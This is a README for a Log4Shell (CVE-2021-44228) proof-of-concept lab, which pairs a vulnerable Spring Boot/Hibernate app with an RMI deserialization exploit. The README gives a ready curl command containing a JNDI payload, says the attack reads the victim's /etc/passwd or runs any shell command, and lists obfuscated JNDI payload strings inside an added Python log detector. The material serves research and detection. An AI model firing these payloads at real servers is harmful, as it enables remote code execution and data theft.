
CVE-2021-44228 POC - Spring / Hibernate

Primary language: Java


This POC uses Spring / Hibernate; however, the same rmi -> deserialization approach (a JNDI lookup that resolves to an attacker-controlled RMI server, which answers with a serialized gadget object that the victim then deserializes) can be used to trigger any Java deserialization gadget chain present on the victim's classpath.

TL;DR

$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

You should see the contents of the victim's /etc/passwd appear in the logs of the attacker container. You can replace the command in the exploit service to run any shell command on the victim.

Victim

The victim is running a standard Spring Boot starter app with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only two modifications have been made on top of this:

  1. Removed tests
  2. Replaced the default SLF4J/Logback logging with a vulnerable log4j 2 release (CVE-2021-44228 affects log4j 2.0-beta9 through 2.14.1)

All other dependencies are up to date, and no JVM flags have been changed. In particular, com.sun.jndi.rmi.object.trustURLCodebase is left at its default of false, so the victim will not load classes from an attacker's codebase; that is why the exploit returns a serialized Hibernate gadget over RMI and relies on the victim deserializing it, rather than on remote class loading.

The victim exposes an endpoint on / that accepts POST requests and logs the request body through log4j; a ${jndi:...} lookup in that body is what triggers the exploit.
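Because the victim logs the request body verbatim, the logged body is also the first place to look for exploitation attempts (application logs, access logs, or a WAF in front of the app). A naive substring match on "${jndi:" misses the obfuscated spellings that log4j resolves before the lookup runs. The following is an added example for this README, not code from the POC repository: a small Python detector that resolves log4j-style nested lookups first (the lower:, upper: and ":-" default forms attackers use for obfuscation) and only then checks for a jndi: lookup. The lookup semantics are a modelled subset of log4j 2's StrSubstitutor behaviour, and the sample request bodies are constructed; the first of them is this README's own payload.

```python
"""Detect Log4Shell-style JNDI lookups in logged request bodies, including the
obfuscated spellings that defeat a naive "${jndi:" substring match.

Added example for this README; it is not part of the POC repository. The
lookup semantics modelled here (lower:, upper:, and the ":-" default syntax)
are the subset of log4j 2's StrSubstitutor behaviour that attackers commonly
abuse for obfuscation; every other lookup resolves to its default (or "").
"""
import re
from typing import List, Tuple

# An innermost ${...} lookup: its body contains none of "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body: str, targets: List[str]) -> str:
    """Evaluate one innermost lookup body roughly the way log4j 2 does.

    log4j splits "${name:-default}" on the first ":-", then lower-cases the
    prefix before "name:" to pick the lookup (so "${JNDI:...}" also works).
    """
    name, _, default = body.partition(":-")
    prefix, has_prefix, rest = name.partition(":")
    prefix = prefix.lower()
    if has_prefix and prefix == "jndi":
        # This is what log4j would hand to InitialContext.lookup(): record it
        # and replace it with a marker so the outer text stops resolving here.
        targets.append(rest)
        return "<JNDI>"
    if has_prefix and prefix == "lower":
        return rest.lower()
    if has_prefix and prefix == "upper":
        return rest.upper()
    # Unknown lookup (env:, date:, a bare "::-x", ...): log4j substitutes the
    # default; with no default we drop it, which is enough for detection.
    return default


def normalize(text: str, max_rounds: int = 64) -> Tuple[str, List[str]]:
    """Repeatedly resolve innermost lookups, returning (normalized text, JNDI
    targets found). Each round strips at least one "${...}" or stops, so the
    loop terminates; max_rounds is only a safety net."""
    targets: List[str] = []
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(lambda m: _resolve_one(m.group(1), targets), text)
        if resolved == text:
            break
        text = resolved
    return text, targets


def scan_lines(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (line, [jndi targets]) for every line that resolves to a JNDI lookup."""
    findings = []
    for line in lines:
        _, targets = normalize(line)
        if targets:
            findings.append((line, targets))
    return findings


# Constructed sample request bodies (not real traffic). The first is the
# README's own payload; the next three are obfuscated spellings of it; the
# last two are benign lookups that must not fire.
SAMPLE_REQUEST_BODIES = [
    "${jndi:rmi://exploit:10000/a}",
    "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://exploit:10000/a}",
    "${${env:NaN:-j}ndi${env:NaN:-:}rmi://exploit:10000/a}",
    "hello from a normal client ${date:yyyy-MM-dd}",
    "price is ${amount:-0} USD",
]

if __name__ == "__main__":
    for line, targets in scan_lines(SAMPLE_REQUEST_BODIES):
        print("JNDI lookup ->", targets, "in:", line)
```

Run it over the victim container's log lines (or request bodies captured at a proxy) instead of the constructed list; anything that resolves to a jndi: lookup, whatever the scheme (rmi, ldap, ldaps, dns), is an attempt worth alerting on, and the recorded target tells you which host the victim was asked to contact.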

Exploit

The exploit relies on a fork of ysoserial that uses the Hibernate payload generator. For the payload to work against the latest version of Hibernate, ysoserial must be recompiled against that Hibernate version.